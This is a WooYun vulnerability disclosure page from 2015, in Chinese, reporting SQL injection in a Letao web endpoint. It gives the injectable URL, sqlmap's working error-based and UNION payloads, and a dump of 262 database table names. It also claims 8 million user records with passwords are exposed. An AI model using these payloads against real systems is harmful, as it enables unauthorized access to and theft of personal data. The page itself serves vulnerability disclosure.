当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0141381

漏洞标题:乐淘网某站SQL注入涉及800万用户信息

相关厂商:乐淘网

漏洞作者: 路人甲

提交时间:2015-09-15 19:31

修复时间:2015-09-20 19:32

公开时间:2015-09-20 19:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-15: 细节已通知厂商并且等待厂商处理中
2015-09-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

乐淘网某站SQL注入涉及800万用户信息

详细说明:

注入点: http://wep.letao.com/wap/app_download.aspx?bid=12*&op=brand

1.jpg


涉及262张表

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* (URI)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: http://wep.letao.com:80/wap/app_download.aspx?bid=12 AND 9010=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(113)+(SELECT (CASE WHEN (9010=9010) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113)))&op=brand
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: http://wep.letao.com:80/wap/app_download.aspx?bid=12 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(122)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(104)+CHAR(108)+CHAR(86)+CHAR(83)+CHAR(109)+CHAR(70)+CHAR(72)+CHAR(112)+CHAR(119)+CHAR(112)+CHAR(113)+CHAR(113)+CHAR(107)+CHAR(98)+CHAR(113),NULL,NULL-- &op=brand
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
Database: letaoerp
[262 tables]
+------------------------------------+
| Addressee |
| BRAND_TECH |
| BRAND_TECH |
| CH_ACCOUNT_BALANCE |
| CH_BOX_ORDER_DETAIL |
| CH_BOX_ORDER_DETAIL |
| CH_LOG |
| CH_RETURN_ORDER_DETAIL |
| CH_RETURN_ORDER_DETAIL |
| CH_RETURN_ORDER_RECORD |
| CH_SELL_ORDER_ADJUST |
| CH_SELL_ORDER_ADJUST |
| CH_SELL_ORDER_DETAIL |
| CH_SELL_ORDER_RECORD |
| CH_SELL_SCHEDULE_ORDER_DETAIL |
| CH_SELL_SCHEDULE_ORDER_DETAIL |
| CH_SHIP_ORDER_DETAIL |
| CH_SHIP_ORDER_DETAIL |
| CmsContent |
| Dealer |
| ERP_ADDR_AREA |
| ERP_ADDR_CITY |
| ERP_ADDR_PROVINCE |
| ERP_AD_DEFINE |
| ERP_AD_PLAN |
| ERP_ARTICLE_CONTENT |
| ERP_ARTICLE_CONTENT |
| ERP_ARTICLE_TYPE |
| ERP_BANK_BANK_CODE |
| ERP_BANK_BRANCH_LIST |
| ERP_BANK_CITY_LIST |
| ERP_BAOSHENG_STOCK |
| ERP_CHANNEL_PROMOTION_TABLE |
| ERP_COUPAN_BATCH |
| ERP_COUPAN_CAMPAIGN |
| ERP_COUPAN_EXCEPTION |
| ERP_COUPAN_RECORD |
| ERP_COUPAN_SECTION |
| ERP_COUPAN_USER_ALLOCATED |
| ERP_COUPON_DANPINPAI_LIST |
| ERP_COUPON_DANPIN_LIST |
| ERP_CO_PAY_RECORD_ONLINE |
| ERP_CO_REFUND_ORDER |
| ERP_CO_REJECT_ORDER |
| ERP_CUSTOMER |
| ERP_DEALER_PRODUCT_LIST |
| ERP_DEALER_STOCK_EXCEPTION |
| ERP_DEALER_STOCK_LIST |
| ERP_DEFECT_WARE_DETAIL |
| ERP_DEFECT_WARE_DETAIL |
| ERP_EDM_BATCH_SEND |
| ERP_EDM_UNSUBSCRIBER |
| ERP_EXPRESS_CONTRACT |
| ERP_EXPRESS_FORM_DEFINE |
| ERP_GIFT_CARD_DEFINE |
| ERP_GIFT_CARD_RECORD |
| ERP_INVENTORY_DIFFERENCE |
| ERP_INVENTORY_DIFF_ADJUST |
| ERP_INVENTORY_DIFF_ADJUST |
| ERP_INVENTORY_RESULT2 |
| ERP_INVENTORY_RESULT2 |
| ERP_INVENTORY_SCAN |
| ERP_INVENTORY_TASK |
| ERP_IPHONE_MESSAGE |
| ERP_InvitePraise_For_TaoBao |
| ERP_JOB |
| ERP_JUSHOU_INFO |
| ERP_KEYWORD_TRANSFER |
| ERP_MARKET_LIBAO |
| ERP_MARKET_ORDERGIFT |
| ERP_MARKET_PRODUCTGIFT |
| ERP_MARKET_URL |
| ERP_MATERIAL_APPLY_DETAIL |
| ERP_MATERIAL_APPLY_DETAIL |
| ERP_MATERIAL_DEALER |
| ERP_MATERIAL_ORDER |
| ERP_MATERIAL_PURCHASE_DETAIL |
| ERP_MATERIAL_PURCHASE_DETAIL |
| ERP_MATERIAL_STAT |
| ERP_MATERIAL_STOCK |
| ERP_MATERIAL_TRANSFER_DETAIL |
| ERP_MATERIAL_TRANSFER_DETAIL |
| ERP_MIAOSHA |
| ERP_MILK_API_LOG |
| ERP_MILK_APP_CONFIG |
| ERP_MOBILE_CATEGORY_CMS |
| ERP_MOBILE_MIAOSHA_V2_DETAIL |
| ERP_MOBILE_MIAOSHA_V2_DETAIL |
| ERP_MOBILE_MIAOSHA_V2_DETAIL |
| ERP_MOBILE_SMS_BATCH_SEND |
| ERP_MiniSite_CSS |
| ERP_MiniSite_PageSource |
| ERP_MiniSite_Page_CSS |
| ERP_MiniSite_Page_Script |
| ERP_MiniSite_Script |
| ERP_NEARESST_DELIVERY |
| ERP_ONTHEHOUR_COUPAN |
| ERP_OP_ITEM_LOCK |
| ERP_OP_ITEM_LOG |
| ERP_ORDER_NOTIFY_HISTORY |
| ERP_ORDER_NOTIFY_HISTORY |
| ERP_PHONE_LOG |
| ERP_PHONE_NAMELOG |
| ERP_PO_SHIP_ORDER_DETAIL |
| ERP_PO_SHIP_ORDER_DETAIL |
| ERP_PRICE_FORMULA |
| ERP_PRODUCT_CATEGORY_DEFINE |
| ERP_PRODUCT_CHANGELOG |
| ERP_PRODUCT_DISCOUNT_DEFINE |
| ERP_PRODUCT_PRICE_MANAGER |
| ERP_PRODUCT_PROPERTIES |
| ERP_PRODUCT_PROPERTY_DEFINE |
| ERP_PROD_PRICE_CHANGELOG |
| ERP_PROMOTION_CATEGORY_LINK |
| ERP_PROMOTION_CATEGORY_LINK |
| ERP_PROMOTION_LIST |
| ERP_PROMOTION_PRICE_FORMULA |
| ERP_PROMOTION_PRODUCT |
| ERP_PURCHASE_DEFER_ORDER |
| ERP_PURCHASE_IMG |
| ERP_PURCHASE_ORDER_DETAIL |
| ERP_PURCHASE_ORDER_DETAIL |
| ERP_ProductOnlyCode |
| ERP_QQ_COUPAN_MAP_TABLE |
| ERP_QUE_TUI_HUO_RECORD |
| ERP_RECEIPT_ORIGINAL |
| ERP_RESTORE |
| ERP_RETURN_BY_EXPRESS_DETAIL |
| ERP_RETURN_BY_EXPRESS_DETAIL |
| ERP_RETURN_BY_EXPRESS_PROVINCE |
| ERP_RETURN_ORDER |
| ERP_RO_RESERVE_PROD_DETAIL |
| ERP_SALES_ORDER_DETAIL |
| ERP_SALES_ORDER_DETAIL |
| ERP_SALES_PREDICTION_BASE |
| ERP_SEM_KEYWORD_LIB |
| ERP_SEM_PROD_SKU_LIST |
| ERP_SEO_CHANEL_CLASS_URL |
| ERP_SEO_CHANEL_LEXICON |
| ERP_SEO_CHANEL_PAGE_CLASS |
| ERP_SEO_CHANEL_PAGE_KEY |
| ERP_SHIPPING_RECORD_DETAIL |
| ERP_SHIPPING_RECORD_DETAIL |
| ERP_SHOE_BRAND_SIZE_TABLE |
| ERP_SITE_MESSAGE |
| ERP_SITE_TEMPLATE_CMS |
| ERP_SO_BANKINFO |
| ERP_SO_BATCH |
| ERP_SO_DE_PRICE_DETAIL |
| ERP_STOCK_MAIN |
| ERP_STOCK_PICKUP_FORM_DETAIL |
| ERP_STOCK_PICKUP_FORM_DETAIL |
| ERP_STOCK_PROD_MOVE_DETAIL |
| ERP_STOCK_PROD_MOVE_DETAIL |
| ERP_STOCK_RETURN_DEALER_FORM |
| ERP_STOCK_RETURN_DEALER_RECORD |
| ERP_STOCK_SHELF_DEFINE |
| ERP_STOCK_TRANSFER |
| ERP_STOCK_UPC |
| ERP_STOCK_UPLOADSHELF_DETAIL |
| ERP_STOCK_UPLOADSHELF_FORM |
| ERP_ShippingTimeOutRule |
| ERP_TALLY_DIFFERENCE |
| ERP_TALLY_SCAN |
| ERP_TALLY_TASK_DETAIL |
| ERP_TALLY_TASK_DETAIL |
| ERP_TRANSFER_RULE |
| ERP_TUANGOU |
| ERP_Tie_Shoes_Method |
| ERP_Tie_Shoes_Step |
| ERP_UNION_LMWL_LIB |
| ERP_UNION_LMWL_LIB |
| ERP_UNION_NOTITY |
| ERP_UNION_PRE_REGISTER |
| ERP_UNION_STEP_RATIO |
| ERP_USERS |
| ERP_USER_ADMIN_LOG |
| ERP_USER_BIND_UNION_TABLE |
| ERP_USER_BLACKLIST |
| ERP_USER_COMMENT |
| ERP_USER_IP_RESTRICTION |
| ERP_USER_LOGIN_LOG |
| ERP_USER_WUYOU_CARD_LOG |
| ERP_USER_WUYOU_CARD_LOG |
| ERP_WAREHOUSE_PART |
| ERP_WAREHOUSE_PRINTER_SETTING |
| ERP_WEIBO_ERROR |
| ERP_WEIBO_KEYWORD |
| ERP_WEIBO_MESSAGE_LOG |
| ERP_WEIBO_MESSAGE_LOG |
| ERP_WORK_ORDER_BEFOREREFUND_DETAIL |
| ERP_WORK_ORDER_BEFOREREFUND_DETAIL |
| ERP_WORK_ORDER_CALLIN_DETAIL |
| ERP_WORK_ORDER_DETAIL |
| ERP_WORK_ORDER_EXPRESS |
| ERP_WORK_ORDER_LOG |
| ERP_WORK_ORDER_PHONE_LOG |
| ERP_WORK_ORDER_PORC_DETAIL |
| ERP_WORK_ORDER_RETURN_DETAIL |
| ERP_WORK_ORDER_STAFF_ONLINE_LOG |
| ERP_WORK_ORDER_TYPE_TIME_SET |
| ERP_WORK_ORDER_UNUSUAL_DETAIL |
| ERP_WORK_ORDER_UPGRADE_DETAIL |
| ERP_WORK_ORDER_UPGRADE_STAT_DETAIL |
| ERP_WorkOrder_Group_Member |
| ERP_WorkOrder_Group_Member |
| EXPRESS_COMPANY_USER |
| EXPRESS_DISTRIBUTE_RULE |
| Erp_tie_shoes_posterDes |
| ExpressCompany |
| FREE_TUAN_ORDER_DETAIL |
| FREE_TUAN_ORDER_FORM |
| INVOICE_PRINT |
| INVOICE_PRINT |
| Image |
| ORDER_COUPAN_RELATIONS |
| OrderDetail |
| OrderForm |
| OrderStatus |
| PRODUCT_BRAND_TECH_MAP |
| PRODUCT_BRAND_TECH_MAP |
| PROMO_SETTING |
| Payments |
| Po_Detail |
| ProdComment |
| ProductPresellDetail |
| ProductPresellDetail |
| Product_Style |
| PurChase_Order |
| SHIPPING_EXPENSE_RULE |
| SHIPPING_EXPENSE_RULE |
| SHIP_ORDER_DETAIL |
| SITE_SOURCE_BIND_TALBE |
| STOCK_BASE |
| STOCK_LOG |
| Shipping_Order |
| Storehouse |
| Third_Part_Logistics_Cost |
| Third_Part_Order_Syn |
| Third_Part_Sales_Prom_Detail |
| Third_Part_Sales_Prom_Detail |
| Third_Part_Sales_Prom_Log |
| Third_Part_Shop_Product |
| Transfer |
| UNION_PAPERS_IMG |
| UNION_PROMOTION |
| UN_Member |
| UN_S_Member |
| UN_School |
| USER_BLACKLIST |
| USER_UNION_BIND_TABLE |
| UnionIp |
| Union_Keys |
| UserCMS |
| Users |
| VIRTUAL_ACCOUNT_DETAIL |
| VIRTUAL_ACCOUNT_DETAIL |
| aa_neigou |
| erp_temp_order_commetnt |
| erp_temp_product |
| erp_temp_users |
| sysdiagrams |
+------------------------------------+


800万用户

2.png


包含邮箱、手机、姓名、用户名、密码等字段

3.png


漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-09-20 19:32

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无